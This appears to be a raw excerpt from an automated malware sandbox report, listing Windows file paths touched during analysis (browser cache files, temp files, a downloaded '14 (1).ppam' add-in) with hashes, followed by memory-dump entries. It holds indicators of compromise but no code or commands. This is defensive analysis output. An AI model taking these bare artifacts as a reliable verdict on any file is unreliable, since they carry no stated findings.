C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize 446B
MD5 4dd1120e370440f036f0ff39feb41deb
SHA1 e715b0fd2932db814e29c1b55fb8b690970812d9
SHA256 17a92d4c5dd525dd6f795b9bd6428a6047f60e0515b939d39218ee740cd550be
SHA512 e4fae14b67ea0351d6cb18a84d95b13aa7bd1bddeed4f7da536afb9e336615c20416f8a6181a8c8538a4f33da1a1ff3ceb6facd576f8bffd37aab5115fd08903
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize 152B
MD5 0f2fd3ffef216b4a9345a3bf7c19e54c
SHA1 bb53767f6009d83c4af27ddb9f72b88d2dea8c1c
SHA256 4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a
SHA512 5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize 152B
MD5 95e22ee8bac6765a868c13fc5ca5017c
SHA1 dff7d454639c700bb4408bf2cef900337977eb56
SHA256 cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802
SHA512 47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize 2KB
MD5 1c3983e2604936fa4420627b5fdcb6f5
SHA1 83991de09f6bae339679274f874188ff154d72f8
SHA256 6762e25a87c7acf43482319e524c55a25550d898762b78972f5771903697176c
SHA512 2e943097f3c98ba2591ea467effb4314025222c3bc4a10effc875cb0bba7899be7b09e2777a144854f3093d47cbde49d3a0d96ff06e674341d26f4af41290c4a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
Filesize 81B
MD5 f222079e71469c4d129b335b7c91355e
SHA1 0056c3003874efef229a5875742559c8c59887dc
SHA256 e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00
SHA512 e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
Filesize 126KB
MD5 6698422bea0359f6d385a4d059c47301
SHA1 b1107d1f8cc1ef600531ed87cea1c41b7be474f6
SHA256 2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
SHA512 d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
Filesize 40B
MD5 95878acc2f35f7e0cab25eafa5a0015d
SHA1 e673cb8e7108c1df1e1f6c6dd038bdfae0b640af
SHA256 b732281984e203f7511780bc3622d4d96dcb1fad3c8bac69077572e16f71c1ff
SHA512 4e26bf0ba35e4a8900bd264527242a6e015d786b3c5a470188058097be68f55f7c8b8aaca607f2b8e0cf3b5caea80b4a1c12125ffe163ec4ebdaec6fb9079965
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637884115190248201
Filesize 8KB
MD5 d8d19e98fc8a233efa5c1792813ed8b2
SHA1 3126b9b3144b2bb299930fa500408de8bf383827
SHA256 624e7f0f1df15e5dba4b8189a40d15949b143fb7ef866e26d76524bd5a1df3d1
SHA512 e09b774c107b8a1ab78cc4695e4690c54c80df8df8a13a1d2abac986ad0c309d3ed81f4e697d72054b6f5590ef01a7604f3d202096b12d69c92d860cd5cd9343
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
Filesize 29B
MD5 ce545b52b20b2f56ffb26d2ca2ed4491
SHA1 ebe904c20bb43891db4560f458e66663826aa885
SHA256 e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899
SHA512 1ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684
Filesize 450KB
MD5 a7aab197b91381bcdec092e1910a3d62
SHA1 35794f2d2df163223391a2b21e1610f14f46a78f
SHA256 6337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b
SHA512 cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774
-
C:\Users\Admin\AppData\Local\Temp\6647D6D.tmp
Filesize 76B
MD5 0479715df4c22e9a75db1e132e8e9f74
SHA1 c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\AppData\Local\Temp\7807D6D.tmp
Filesize 76B
MD5 0479715df4c22e9a75db1e132e8e9f74
SHA1 c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\AppData\Local\Temp\7C47D6D.tmp
Filesize 76B
MD5 0479715df4c22e9a75db1e132e8e9f74
SHA1 c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA256 46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512 e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\Downloads\14 (1).ppam
Filesize 41KB
MD5 66367046957810309248fcec536d7ccb
SHA1 5a118ce3f251140e852927503a3743442c68ff63
SHA256 26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b
SHA512 1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08
-
\??\pipe\LOCAL\crashpad_3484_KRNRFHMUSJHCEHAB
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4500_JKXGEPWAYAAQMAIN
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-130-0x0000000000000000-mapping.dmp
-
memory/804-265-0x0000000000000000-mapping.dmp
-
memory/1188-167-0x0000000000000000-mapping.dmp
-
memory/1296-180-0x0000000000000000-mapping.dmp
-
memory/1348-153-0x0000000000000000-mapping.dmp
-
memory/1472-141-0x0000000000000000-mapping.dmp
-
memory/1592-142-0x0000000000000000-mapping.dmp
-
memory/1720-188-0x0000000000000000-mapping.dmp
-
memory/1748-168-0x0000000000000000-mapping.dmp
-
memory/2004-182-0x0000000000000000-mapping.dmp
-
memory/2836-186-0x0000000000000000-mapping.dmp
-
memory/3064-147-0x0000000000000000-mapping.dmp
-
memory/3120-156-0x0000000000000000-mapping.dmp
-
memory/3180-266-0x0000000000000000-mapping.dmp
-
memory/3484-133-0x0000000000000000-mapping.dmp
-
memory/3612-165-0x0000000000000000-mapping.dmp
-
memory/3648-132-0x0000000000000000-mapping.dmp
-
memory/3828-269-0x0000000000000000-mapping.dmp
-
memory/3828-150-0x0000000000000000-mapping.dmp
-
memory/4000-184-0x0000000000000000-mapping.dmp
-
memory/4000-236-0x0000000000000000-mapping.dmp
-
memory/4104-192-0x0000000000000000-mapping.dmp
-
memory/4336-136-0x0000000000000000-mapping.dmp
-
memory/4500-155-0x0000000000000000-mapping.dmp
-
memory/4680-190-0x0000000000000000-mapping.dmp
-
memory/4776-166-0x0000000000000000-mapping.dmp
-
memory/4992-256-0x0000000000000000-mapping.dmp
-
memory/5176-235-0x0000000000000000-mapping.dmp
-
memory/5176-193-0x0000000000000000-mapping.dmp
-
memory/5236-195-0x0000000000000000-mapping.dmp
-
memory/5252-196-0x0000000000000000-mapping.dmp
-
memory/5360-230-0x0000000000000000-mapping.dmp
-
memory/5388-199-0x0000000000000000-mapping.dmp
-
memory/5404-201-0x0000000000000000-mapping.dmp
-
memory/5572-237-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp
Filesize 64KB
-
memory/5572-204-0x0000000000000000-mapping.dmp
-
memory/5572-231-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp
Filesize 64KB
-
memory/5572-215-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5572-213-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5572-211-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-248-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-209-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-205-0x0000000000000000-mapping.dmp
-
memory/5732-239-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-245-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-242-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5732-220-0x00007FFB41170000-0x00007FFB41180000-memory.dmp
Filesize 64KB
-
memory/5808-206-0x0000000000000000-mapping.dmp
-
memory/5860-267-0x0000000000000000-mapping.dmp
-
memory/5924-207-0x0000000000000000-mapping.dmp
-
memory/5928-268-0x0000000000000000-mapping.dmp
-
memory/6016-208-0x0000000000000000-mapping.dmp
-
memory/6084-216-0x0000000000000000-mapping.dmp